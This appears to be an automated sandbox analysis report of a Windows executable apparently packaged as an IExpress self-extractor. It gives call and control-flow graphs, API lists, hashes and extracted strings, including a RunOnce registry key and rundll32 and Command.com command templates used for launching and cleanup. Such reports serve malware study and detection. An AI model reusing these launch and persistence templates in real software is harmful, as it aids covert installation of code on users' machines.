3309 7ff681c25a28 3308->3309 3310 7ff681c25a7d SetFilePointer 3309->3310 3311 7ff681c25a3c 3309->3311 3310->3311 3312 7ff681c2831e 3314 7ff681c28332 3312->3314 3319 7ff681c28aa8 GetModuleHandleW 3314->3319 3315 7ff681c28399 __set_app_type 3316 7ff681c283d6 3315->3316 3317 7ff681c283ec 3316->3317 3318 7ff681c283df __setusermatherr 3316->3318 3318->3317 3320 7ff681c28abd 3319->3320 3320->3315 3321 7ff681c28a1e SetUnhandledExceptionFilter 3322 7ff681c2845e 3323 7ff681c28478 GetStartupInfoW 3322->3323 3324 7ff681c284ab 3323->3324 3325 7ff681c284bd 3324->3325 3327 7ff681c284da Sleep 3324->3327 3326 7ff681c284cd _amsg_exit 3325->3326 3330 7ff681c284e7 3325->3330 3326->3330 3327->3324 3328 7ff681c28569 _initterm 3332 7ff681c28586 _IsNonwritableInCurrentImage 3328->3332 3329 7ff681c2854a 3330->3328 3330->3329 3330->3332 3331 7ff681c2866f _ismbblead 3331->3332 3332->3329 3332->3331 3333 7ff681c285f4 3332->3333 3334 7ff681c22d70 292 API calls 3333->3334 3335 7ff681c2862f 3334->3335 3336 7ff681c28646 3335->3336 3337 7ff681c2863e exit 3335->3337 3336->3329 3338 7ff681c2864f _cexit 3336->3338 3337->3336 3338->3329 3339 7ff681c25820 3340 7ff681c25881 ReadFile 3339->3340 3341 7ff681c2584d 3339->3341 3340->3341

                                                                                          Callgraph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          • Opacity -> Relevance
                                                                                          • Disassembly available
                                                                                          callgraph 0 Function_00007FF681C27E08 1 Function_00007FF681C21008 0->1 2 Function_00007FF681C22308 3 Function_00007FF681C28B10 4 Function_00007FF681C27B0F 4->0 48 Function_00007FF681C286F0 4->48 5 Function_00007FF681C26710 5->0 9 Function_00007FF681C26F14 5->9 5->48 70 Function_00007FF681C265A8 5->70 76 Function_00007FF681C26D9C 5->76 98 Function_00007FF681C27958 5->98 6 Function_00007FF681C21D10 6->0 16 Function_00007FF681C24F2C 6->16 41 Function_00007FF681C210BC 6->41 6->48 7 Function_00007FF681C28714 8 Function_00007FF681C23214 8->0 8->9 15 Function_00007FF681C27D28 8->15 8->16 37 Function_00007FF681C261D4 8->37 43 Function_00007FF681C223C0 8->43 8->48 51 Function_00007FF681C268F0 8->51 60 Function_00007FF681C26294 8->60 64 Function_00007FF681C25F80 8->64 67 Function_00007FF681C27984 8->67 74 Function_00007FF681C241B4 8->74 87 Function_00007FF681C24A54 8->87 8->98 103 Function_00007FF681C24064 8->103 9->16 28 Function_00007FF681C22520 9->28 9->48 9->98 10 Function_00007FF681C251F8 11 Function_00007FF681C25CFC 12 Function_00007FF681C28B00 13 Function_00007FF681C28400 14 Function_00007FF681C28D02 90 Function_00007FF681C28D3C 14->90 15->16 16->41 16->48 66 Function_00007FF681C28084 16->66 86 Function_00007FF681C28154 16->86 17 Function_00007FF681C21130 17->48 18 Function_00007FF681C22034 18->0 18->1 18->18 18->48 19 Function_00007FF681C22234 19->0 19->48 20 Function_00007FF681C23D34 20->16 20->48 20->66 75 Function_00007FF681C22898 20->75 20->86 21 Function_00007FF681C28E20 22 Function_00007FF681C2351E 30 Function_00007FF681C24DC8 22->30 23 Function_00007FF681C25A1E 24 Function_00007FF681C2831E 24->12 68 Function_00007FF681C28AA8 24->68 25 Function_00007FF681C28A1E 26 Function_00007FF681C25820 27 Function_00007FF681C27320 27->0 29 Function_00007FF681C288C8 27->29 39 Function_00007FF681C27FB8 27->39 45 Function_00007FF681C21BC0 27->45 27->48 77 Function_00007FF681C2729C 27->77 81 Function_00007FF681C27F48 27->81 28->16 28->41 28->48 29->7 30->48 31 Function_00007FF681C25ACA 32 Function_00007FF681C28CCA 33 Function_00007FF681C234CE 34 Function_00007FF681C289CE 35 Function_00007FF681C258D0 65 Function_00007FF681C23C80 35->65 36 Function_00007FF681C252D4 36->1 37->10 37->16 37->67 38 Function_00007FF681C253B8 38->15 40 Function_00007FF681C255BA 40->16 42 Function_00007FF681C28BC0 43->2 43->19 44 Function_00007FF681C255C0 44->16 45->16 46 Function_00007FF681C22AE8 46->48 79 Function_00007FF681C27EA0 46->79 47 Function_00007FF681C25AEA 48->7 49 Function_00007FF681C28DF0 50 Function_00007FF681C25AF1 50->11 50->36 50->38 50->44 50->48 61 Function_00007FF681C25478 50->61 73 Function_00007FF681C259B0 50->73 51->0 51->5 51->9 51->10 51->15 51->16 51->48 58 Function_00007FF681C22490 51->58 51->98 52 Function_00007FF681C28BF4 53 Function_00007FF681C215F4 53->0 53->1 53->16 53->39 53->41 53->46 53->48 99 Function_00007FF681C21558 53->99 54 Function_00007FF681C21BF4 54->16 54->48 55 Function_00007FF681C263DC 55->18 55->48 55->79 56 Function_00007FF681C22EDC 56->10 56->15 56->16 56->18 56->20 56->27 56->48 97 Function_00007FF681C21258 56->97 57 Function_00007FF681C2868E 58->16 58->48 59 Function_00007FF681C28A92 60->10 60->16 60->98 61->16 62 Function_00007FF681C2397E 62->30 63 Function_00007FF681C25F7E 63->10 63->16 92 Function_00007FF681C25E44 63->92 64->10 64->16 64->92 67->41 67->48 82 Function_00007FF681C28A4C 68->82 69 Function_00007FF681C259A9 70->0 70->41 70->48 71 Function_00007FF681C27AAF 72 Function_00007FF681C25AAE 74->0 74->6 74->10 74->16 74->41 74->48 74->53 85 Function_00007FF681C27C50 74->85 88 Function_00007FF681C24838 74->88 74->98 91 Function_00007FF681C22644 75->91 76->0 76->16 76->98 78 Function_00007FF681C28BA0 80 Function_00007FF681C28049 83 Function_00007FF681C2874B 83->7 84 Function_00007FF681C23A4E 84->16 84->30 84->65 85->0 85->48 86->48 87->10 87->16 88->16 88->43 88->48 88->98 89 Function_00007FF681C24B3B 91->0 91->48 92->44 92->48 92->73 93 Function_00007FF681C2146E 93->30 93->48 94 Function_00007FF681C2366E 94->0 94->9 94->16 94->30 94->76 96 Function_00007FF681C24B70 94->96 95 Function_00007FF681C22D70 95->8 95->16 95->43 95->54 95->55 95->56 96->16 97->17 97->48 99->81 100 Function_00007FF681C28460 100->52 100->95 101 Function_00007FF681C28B60 100->101 101->3 101->42 102 Function_00007FF681C2845E 102->95 102->101 103->10 103->15 103->16 103->98

                                                                                          Executed Functions

                                                                                          Function 00007FF681C241B4 Relevance: 54.6, APIs: 17, Strings: 14, Instructions: 372libraryloaderCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 0 7ff681c241b4-7ff681c24206 1 7ff681c24229-7ff681c24231 0->1 2 7ff681c24208-7ff681c24223 call 7ff681c251f8 0->2 3 7ff681c24235-7ff681c24257 memset 1->3 2->1 8 7ff681c2434a-7ff681c24373 call 7ff681c24f2c 2->8 5 7ff681c24378-7ff681c2438b 3->5 6 7ff681c2425d-7ff681c24278 call 7ff681c251f8 3->6 10 7ff681c2438f-7ff681c24399 5->10 6->8 17 7ff681c2427e-7ff681c24284 6->17 23 7ff681c245e9 8->23 11 7ff681c2439b-7ff681c243a1 10->11 12 7ff681c243ad-7ff681c243b8 10->12 11->12 15 7ff681c243a3-7ff681c243ab 11->15 16 7ff681c243bb-7ff681c243be 12->16 15->10 15->12 19 7ff681c2441e-7ff681c24433 call 7ff681c215f4 16->19 20 7ff681c243c0-7ff681c243d8 call 7ff681c251f8 16->20 21 7ff681c24286-7ff681c2428b 17->21 22 7ff681c2428d-7ff681c24290 17->22 19->23 37 7ff681c24439-7ff681c24440 19->37 20->8 36 7ff681c243de-7ff681c243e5 20->36 26 7ff681c242a5 21->26 27 7ff681c2429d-7ff681c2429f 22->27 28 7ff681c24292-7ff681c2429b 22->28 24 7ff681c245eb-7ff681c2461a call 7ff681c286f0 23->24 32 7ff681c242a8-7ff681c242ab 26->32 27->32 33 7ff681c242a1 27->33 28->26 32->16 38 7ff681c242b1-7ff681c242bb 32->38 33->26 39 7ff681c243eb-7ff681c24418 CompareStringA 36->39 40 7ff681c246d3-7ff681c246da 36->40 41 7ff681c24460-7ff681c24462 37->41 42 7ff681c24442-7ff681c24449 37->42 43 7ff681c24327-7ff681c2432a 38->43 44 7ff681c242bd-7ff681c242c0 38->44 39->19 39->40 45 7ff681c24828-7ff681c2482a 40->45 46 7ff681c246e0-7ff681c246e7 40->46 47 7ff681c24468-7ff681c2446f 41->47 48 7ff681c24593-7ff681c2459f call 7ff681c24838 41->48 42->41 50 7ff681c2444b-7ff681c24452 42->50 43->19 49 7ff681c24330-7ff681c24348 call 7ff681c251f8 43->49 51 7ff681c242cb-7ff681c242cd 44->51 52 7ff681c242c2-7ff681c242c9 44->52 45->24 46->45 54 7ff681c246ed-7ff681c2471c RegOpenKeyExA 46->54 56 7ff681c24475-7ff681c24477 47->56 57 7ff681c24694-7ff681c246ce call 7ff681c24f2c LocalFree 47->57 65 7ff681c245a4-7ff681c245a6 48->65 49->8 49->16 50->41 60 7ff681c24454-7ff681c24456 50->60 51->23 55 7ff681c242d3 51->55 53 7ff681c242da-7ff681c242eb call 7ff681c251f8 52->53 53->8 78 7ff681c242ed-7ff681c2431d CompareStringA 53->78 54->45 62 7ff681c24722-7ff681c24761 RegQueryValueExA 54->62 55->53 56->48 64 7ff681c2447d-7ff681c24484 56->64 57->23 60->47 61 7ff681c24458-7ff681c2445b call 7ff681c21d10 60->61 61->41 69 7ff681c24817-7ff681c24823 RegCloseKey 62->69 70 7ff681c24767-7ff681c24796 memset GetSystemDirectoryA 62->70 64->48 72 7ff681c2448a-7ff681c24495 call 7ff681c27c50 64->72 73 7ff681c245a8-7ff681c245be LocalFree 65->73 74 7ff681c245da-7ff681c245e4 LocalFree 65->74 69->45 76 7ff681c24798-7ff681c247a9 call 7ff681c27e08 70->76 77 7ff681c247ae-7ff681c247d7 call 7ff681c210bc 70->77 86 7ff681c2449b-7ff681c244b7 GetProcAddress 72->86 87 7ff681c2466f-7ff681c24692 call 7ff681c24f2c 72->87 73->40 80 7ff681c245c4-7ff681c245c9 73->80 74->23 76->77 88 7ff681c247de-7ff681c247e5 77->88 78->43 82 7ff681c2431f-7ff681c24322 78->82 80->3 82->19 89 7ff681c244bd-7ff681c2450b 86->89 90 7ff681c2461c-7ff681c24649 call 7ff681c24f2c FreeLibrary 86->90 98 7ff681c2464e-7ff681c2466a LocalFree call 7ff681c27958 87->98 88->88 93 7ff681c247e7-7ff681c24812 RegSetValueExA 88->93 94 7ff681c2450d-7ff681c24511 89->94 95 7ff681c24515-7ff681c2451d 89->95 90->98 93->69 94->95 99 7ff681c24527-7ff681c24529 95->99 100 7ff681c2451f-7ff681c24523 95->100 98->23 102 7ff681c2452b-7ff681c2452f 99->102 103 7ff681c24533-7ff681c2453b 99->103 100->99 102->103 104 7ff681c2453d-7ff681c24541 103->104 105 7ff681c24545-7ff681c24547 103->105 104->105 107 7ff681c24549-7ff681c2454d 105->107 108 7ff681c24551-7ff681c2457e 105->108 107->108 110 7ff681c245ce-7ff681c245d5 FreeLibrary 108->110 111 7ff681c24580-7ff681c24591 FreeLibrary 108->111 110->74 111->73
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1572456169.00007FF681C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF681C20000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1572432836.00007FF681C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1572474043.00007FF681C29000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1572489641.00007FF681C2C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1572507003.00007FF681C2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff681c20000_0XVZC3kfwL.jbxd
                                                                                          Similarity
                                                                                          • API ID: Resource$Free$CompareFindLibraryLocalString$AddressLoadLockProcSizeofmemcpy_smemset
                                                                                          • String ID: <None>$ADMQCMD$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$DoInfInstall$POSTRUNPROGRAM$REBOOT$RUNPROGRAM$SHOWWINDOW$Software\Microsoft\Windows\CurrentVersion\RunOnce$USRQCMD$advpack.dll$gam$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup0
                                                                                          • API String ID: 2679723528-1510213498
                                                                                          • Opcode ID: effdab913d68b8f5cb6356f1f4624d08c697481126c570b33e8394dce573185e
                                                                                          • Instruction ID: 48d3e8d2570c31c1f3d675755cc63f32af99fe50b8c5dbc66d44749d42a8d5d9
                                                                                          • Opcode Fuzzy Hash: effdab913d68b8f5cb6356f1f4624d08c697481126c570b33e8394dce573185e
                                                                                          • Instruction Fuzzy Hash: EE027D71A08692C7EB609B25E8406BA7BB0FF8D744F64613DDA4E83AA4DF7CE545C700
                                                                                          Function 00007FF681C21D10 Relevance: 42.2, APIs: 16, Strings: 8, Instructions: 182registrylibrarymemoryCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1572456169.00007FF681C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF681C20000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1572432836.00007FF681C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1572474043.00007FF681C29000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1572489641.00007FF681C2C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1572507003.00007FF681C2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff681c20000_0XVZC3kfwL.jbxd
                                                                                          Similarity
                                                                                          • API ID: Close$DirectoryFreeLibraryLocalSystemValuememset$AddressAllocCreateFileLoadModuleNameProcQuery
                                                                                          • String ID: %s /D:%s$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$DelNodeRunDLL32$Software\Microsoft\Windows\CurrentVersion\RunOnce$advpack.dll$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup%d$wextract_cleanup0
                                                                                          • API String ID: 1522771004-3208851462
                                                                                          • Opcode ID: 2b53b3767e793faff65087a239a43c24df66161b19351fe183ebef1a3c7f0936
                                                                                          • Instruction ID: 4bdfba7d277e39c221b1259c3aa5a727a8bf723c2a9f60058d3292cf0f512b4b
                                                                                          • Opcode Fuzzy Hash: 2b53b3767e793faff65087a239a43c24df66161b19351fe183ebef1a3c7f0936
                                                                                          • Instruction Fuzzy Hash: A8814972A18A82C7EB508B21E8442B9BBB0FF8DB54F646139DA4E83754DF3CE505C740
                                                                                          Function 00007FF681C215F4 Relevance: 37.1, APIs: 10, Strings: 11, Instructions: 375memoryCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 144 7ff681c215f4-7ff681c21646 145 7ff681c21649-7ff681c21653 144->145 146 7ff681c21668-7ff681c2167a 145->146 147 7ff681c21655-7ff681c2165b 145->147 149 7ff681c21689-7ff681c21690 146->149 150 7ff681c2167c-7ff681c21687 146->150 147->146 148 7ff681c2165d-7ff681c21666 147->148 148->145 148->146 151 7ff681c21694-7ff681c216b2 call 7ff681c21558 149->151 150->151 154 7ff681c2171e-7ff681c21730 151->154 155 7ff681c216b4 151->155 157 7ff681c21735-7ff681c2173f 154->157 156 7ff681c216b7-7ff681c216be 155->156 156->156 158 7ff681c216c0-7ff681c216c4 156->158 159 7ff681c21741-7ff681c21747 157->159 160 7ff681c21754-7ff681c2176d call 7ff681c27e08 157->160 158->154 162 7ff681c216c6-7ff681c216cd 158->162 159->160 163 7ff681c21749-7ff681c21752 159->163 164 7ff681c21772-7ff681c21782 call 7ff681c27fb8 160->164 165 7ff681c216cf-7ff681c216d2 162->165 166 7ff681c216d4-7ff681c216d6 162->166 163->157 163->160 172 7ff681c21788-7ff681c217b5 CompareStringA 164->172 173 7ff681c219d3-7ff681c219e3 call 7ff681c27fb8 164->173 165->166 168 7ff681c216dc-7ff681c216ec 165->168 166->154 169 7ff681c216d8-7ff681c216da 166->169 171 7ff681c216ef-7ff681c216f9 168->171 169->154 169->168 174 7ff681c216fb-7ff681c21701 171->174 175 7ff681c2170e-7ff681c2171c 171->175 172->173 177 7ff681c217bb-7ff681c217cf GetFileAttributesA 172->177 182 7ff681c219e9-7ff681c21a16 CompareStringA 173->182 183 7ff681c21a83-7ff681c21aa1 LocalAlloc 173->183 174->175 178 7ff681c21703-7ff681c2170c 174->178 175->164 180 7ff681c219ab-7ff681c219b3 177->180 181 7ff681c217d5-7ff681c217dd 177->181 178->171 178->175 185 7ff681c219b8-7ff681c219ce call 7ff681c24f2c 180->185 181->180 184 7ff681c217e3-7ff681c217ff call 7ff681c21558 181->184 182->183 186 7ff681c21a18-7ff681c21a1f 182->186 188 7ff681c21a5a-7ff681c21a65 183->188 189 7ff681c21aa3-7ff681c21ab7 GetFileAttributesA 183->189 199 7ff681c21801-7ff681c2181e call 7ff681c21558 184->199 200 7ff681c21823-7ff681c21841 LocalAlloc 184->200 197 7ff681c21b8f-7ff681c21bb8 call 7ff681c286f0 185->197 194 7ff681c21a22-7ff681c21a29 186->194 188->185 191 7ff681c21b36-7ff681c21b40 189->191 192 7ff681c21ab9-7ff681c21abb 189->192 201 7ff681c21b47-7ff681c21b51 191->201 192->191 196 7ff681c21abd-7ff681c21ace 192->196 194->194 198 7ff681c21a2b 194->198 202 7ff681c21ad5-7ff681c21adf 196->202 204 7ff681c21a30-7ff681c21a37 198->204 199->200 200->188 206 7ff681c21847-7ff681c218c3 GetPrivateProfileIntA GetPrivateProfileStringA 200->206 207 7ff681c21b53-7ff681c21b58 201->207 208 7ff681c21b65-7ff681c21b70 201->208 210 7ff681c21ae1-7ff681c21ae7 202->210 211 7ff681c21af4-7ff681c21b05 202->211 204->204 213 7ff681c21a39-7ff681c21a58 LocalAlloc 204->213 214 7ff681c21940-7ff681c2194f 206->214 215 7ff681c218c5-7ff681c218d4 206->215 207->208 216 7ff681c21b5a-7ff681c21b63 207->216 209 7ff681c21b73-7ff681c21b7d call 7ff681c22ae8 208->209 226 7ff681c21b82-7ff681c21b8c 209->226 210->211 218 7ff681c21ae9-7ff681c21af2 210->218 211->209 219 7ff681c21b07-7ff681c21b0a 211->219 213->188 222 7ff681c21a6a-7ff681c21a7e call 7ff681c210bc 213->222 220 7ff681c21951-7ff681c21971 GetShortPathNameA 214->220 221 7ff681c21973 214->221 223 7ff681c218d7-7ff681c218e1 215->223 216->201 216->208 218->202 218->211 219->209 227 7ff681c21b0c-7ff681c21b34 call 7ff681c21008 * 2 219->227 228 7ff681c2197a-7ff681c219a6 call 7ff681c210bc 220->228 221->228 222->226 224 7ff681c218f6-7ff681c2190c 223->224 225 7ff681c218e3-7ff681c218e9 223->225 231 7ff681c2190f-7ff681c21919 224->231 225->224 230 7ff681c218eb-7ff681c218f4 225->230 226->197 227->209 228->226 230->223 230->224 235 7ff681c2191b-7ff681c21920 231->235 236 7ff681c2192d-7ff681c2193b 231->236 235->236 239 7ff681c21922-7ff681c2192b 235->239 236->226 239->231 239->236
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1572456169.00007FF681C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF681C20000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1572432836.00007FF681C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1572474043.00007FF681C29000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1572489641.00007FF681C2C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1572507003.00007FF681C2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff681c20000_0XVZC3kfwL.jbxd
                                                                                          Similarity
                                                                                          • API ID: String$PrivateProfile$AllocAttributesCompareFileLoadLocalMessageNamePathShort
                                                                                          • String ID: .BAT$.INF$AdvancedINF$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$Command.com /c %s$DefaultInstall$Reboot$Version$rundll32.exe %s,InstallHinfSection %s 128 %s$setupapi.dll$setupx.dll
                                                                                          • API String ID: 383838535-1095083631
                                                                                          • Opcode ID: 04e882688a3d6962a8916aaff69b712f8d647ab79ac1c3b0525099cd5c9803bb
                                                                                          • Instruction ID: fa03966b3264d001ae24abaec8d682c680403c19a968088d9d4dcaec9e7d38dc
                                                                                          • Opcode Fuzzy Hash: 04e882688a3d6962a8916aaff69b712f8d647ab79ac1c3b0525099cd5c9803bb
                                                                                          • Instruction Fuzzy Hash: 24F18C62B08782D6EB618F24E4402BA7BB1FF49B94FA46139DA4D83795DF3DE509C300
                                                                                          Function 00007FF681C268F0 Relevance: 35.3, APIs: 14, Strings: 6, Instructions: 299memorystringCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 242 7ff681c268f0-7ff681c26950 call 7ff681c251f8 LocalAlloc 245 7ff681c26982-7ff681c26996 call 7ff681c251f8 242->245 246 7ff681c26952-7ff681c26975 call 7ff681c24f2c call 7ff681c27958 242->246 252 7ff681c26998-7ff681c269cf call 7ff681c24f2c LocalFree 245->252 253 7ff681c269d1-7ff681c26a16 lstrcmpA LocalFree 245->253 261 7ff681c2697b-7ff681c2697d 246->261 252->261 254 7ff681c26a18-7ff681c26a1a 253->254 255 7ff681c26a63-7ff681c26a69 253->255 259 7ff681c26a27 254->259 260 7ff681c26a1c-7ff681c26a25 254->260 262 7ff681c26a6f-7ff681c26a75 255->262 263 7ff681c26d40-7ff681c26d64 call 7ff681c27d28 255->263 264 7ff681c26a2a-7ff681c26a3a call 7ff681c26710 259->264 260->259 260->264 265 7ff681c26d66-7ff681c26d92 call 7ff681c286f0 261->265 262->263 267 7ff681c26a7b-7ff681c26a9c GetTempPathA 262->267 263->265 278 7ff681c26d3b-7ff681c26d3e 264->278 279 7ff681c26a40-7ff681c26a5e call 7ff681c24f2c 264->279 271 7ff681c26ad9-7ff681c26ae5 267->271 272 7ff681c26a9e-7ff681c26aaa call 7ff681c26710 267->272 274 7ff681c26ae8-7ff681c26aeb 271->274 277 7ff681c26aaf-7ff681c26ab1 272->277 280 7ff681c26af0-7ff681c26afa 274->280 277->278 281 7ff681c26ab7-7ff681c26ac1 call 7ff681c22490 277->281 278->265 279->261 283 7ff681c26b0d-7ff681c26b1f 280->283 284 7ff681c26afc-7ff681c26b01 280->284 281->271 296 7ff681c26ac3-7ff681c26ad3 call 7ff681c26710 281->296 288 7ff681c26d07-7ff681c26d30 GetWindowsDirectoryA call 7ff681c26f14 283->288 289 7ff681c26b25-7ff681c26b3b GetDriveTypeA 283->289 284->283 287 7ff681c26b03-7ff681c26b0b 284->287 287->280 287->283 288->261 301 7ff681c26d36 288->301 292 7ff681c26b3d-7ff681c26b40 289->292 293 7ff681c26b42-7ff681c26b56 GetFileAttributesA 289->293 292->293 295 7ff681c26b5c-7ff681c26b5f 292->295 294 7ff681c26be9-7ff681c26bfc call 7ff681c26f14 293->294 293->295 309 7ff681c26bfe-7ff681c26c0a call 7ff681c22490 294->309 310 7ff681c26c20-7ff681c26c2c call 7ff681c22490 294->310 298 7ff681c26bd9 295->298 299 7ff681c26b61-7ff681c26b6b 295->299 296->271 296->278 303 7ff681c26bdd-7ff681c26be4 298->303 299->303 304 7ff681c26b6d-7ff681c26b7f 299->304 301->274 308 7ff681c26cfe-7ff681c26d01 303->308 304->303 307 7ff681c26b81-7ff681c26bad GetDiskFreeSpaceA 304->307 307->298 312 7ff681c26baf-7ff681c26bd0 MulDiv 307->312 308->288 308->289 309->298 319 7ff681c26c0c-7ff681c26c1e call 7ff681c26f14 309->319 317 7ff681c26c2e-7ff681c26c3d GetWindowsDirectoryA 310->317 318 7ff681c26c42-7ff681c26c6a call 7ff681c27e08 GetFileAttributesA 310->318 312->298 315 7ff681c26bd2-7ff681c26bd7 312->315 315->294 315->298 317->318 324 7ff681c26c6c-7ff681c26c7f CreateDirectoryA 318->324 325 7ff681c26c81 318->325 319->298 319->310 326 7ff681c26c84-7ff681c26c86 324->326 325->326 327 7ff681c26c99-7ff681c26cba SetFileAttributesA 326->327 328 7ff681c26c88-7ff681c26c97 326->328 329 7ff681c26cbd-7ff681c26cc7 327->329 328->308 330 7ff681c26cc9-7ff681c26ccf 329->330 331 7ff681c26cdb-7ff681c26cf8 call 7ff681c26710 329->331 330->331 333 7ff681c26cd1-7ff681c26cd9 330->333 331->278 335 7ff681c26cfa 331->335 333->329 333->331 335->308
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1572456169.00007FF681C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF681C20000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1572432836.00007FF681C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1572474043.00007FF681C29000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1572489641.00007FF681C2C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1572507003.00007FF681C2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff681c20000_0XVZC3kfwL.jbxd
                                                                                          Similarity
                                                                                          • API ID: Resource$Free$AttributesDirectoryFileFindLoadLocal$Windows$AllocCreateDialogDiskDriveErrorIndirectLastLockMessageParamPathSizeofSpaceStringTempTypelstrcmpmemcpy_s
                                                                                          • String ID: <None>$A:\$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$RUNPROGRAM$Z$msdownld.tmp
                                                                                          • API String ID: 3973824516-675003171
                                                                                          • Opcode ID: 5151b4b690296a413f45ac042e329daac5bcf9e7a260b3d0364b2d4300db6156
                                                                                          • Instruction ID: b93c628ca1ed981c363f092a0adb82af56b44b3d7965c71db5f0ddce12f44606
                                                                                          • Opcode Fuzzy Hash: 5151b4b690296a413f45ac042e329daac5bcf9e7a260b3d0364b2d4300db6156
                                                                                          • Instruction Fuzzy Hash: 4ED17F62A186A2C7EB509F21E4502BAB7B1FF9D741F646039DA4E83694DF3DE805CB10
                                                                                          Function 00007FF681C22EDC Relevance: 28.2, APIs: 10, Strings: 6, Instructions: 179synchronizationCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 336 7ff681c22edc-7ff681c22f75 call 7ff681c28da9 memset * 2 call 7ff681c251f8 341 7ff681c22f7b-7ff681c22fbc CreateEventA SetEvent call 7ff681c251f8 336->341 342 7ff681c231cd 336->342 347 7ff681c22feb-7ff681c22ff3 341->347 348 7ff681c22fbe-7ff681c22fc8 341->348 344 7ff681c231d2-7ff681c231e1 call 7ff681c24f2c 342->344 349 7ff681c231e6 344->349 352 7ff681c22ffd-7ff681c23018 call 7ff681c251f8 347->352 353 7ff681c22ff5-7ff681c22ff7 347->353 350 7ff681c22fca-7ff681c22fe6 call 7ff681c24f2c 348->350 351 7ff681c231e8-7ff681c2320b call 7ff681c286f0 349->351 350->349 362 7ff681c23026-7ff681c23044 CreateMutexA 352->362 363 7ff681c2301a-7ff681c23024 352->363 353->352 356 7ff681c230cb-7ff681c230db call 7ff681c27320 353->356 366 7ff681c230dd-7ff681c230e7 356->366 367 7ff681c230ec-7ff681c230f3 356->367 362->356 365 7ff681c2304a-7ff681c2305b GetLastError 362->365 363->350 365->356 370 7ff681c2305d-7ff681c23070 365->370 366->344 368 7ff681c23106-7ff681c23125 FindResourceExA 367->368 369 7ff681c230f5-7ff681c23101 call 7ff681c22034 367->369 372 7ff681c23127-7ff681c23139 LoadResource 368->372 373 7ff681c2313c-7ff681c23143 368->373 369->349 374 7ff681c2308a-7ff681c230a7 call 7ff681c24f2c 370->374 375 7ff681c23072-7ff681c23088 call 7ff681c24f2c 370->375 372->373 378 7ff681c23151-7ff681c23158 373->378 379 7ff681c23145-7ff681c2314c #17 373->379 374->356 385 7ff681c230a9-7ff681c230c6 CloseHandle 374->385 375->385 382 7ff681c2315a-7ff681c2315d 378->382 383 7ff681c23162-7ff681c2316c call 7ff681c23d34 378->383 379->378 382->351 383->349 388 7ff681c2316e-7ff681c2317d 383->388 385->349 388->382 389 7ff681c2317f-7ff681c23189 388->389 389->382 390 7ff681c2318b-7ff681c23192 389->390 390->382 391 7ff681c23194-7ff681c2319b call 7ff681c21258 390->391 391->382 394 7ff681c2319d-7ff681c231c9 call 7ff681c27d28 391->394 394->349 397 7ff681c231cb 394->397 397->382
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1572456169.00007FF681C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF681C20000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1572432836.00007FF681C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1572474043.00007FF681C29000.00000002.00000001.01000000.00000003.sdmpDownload File
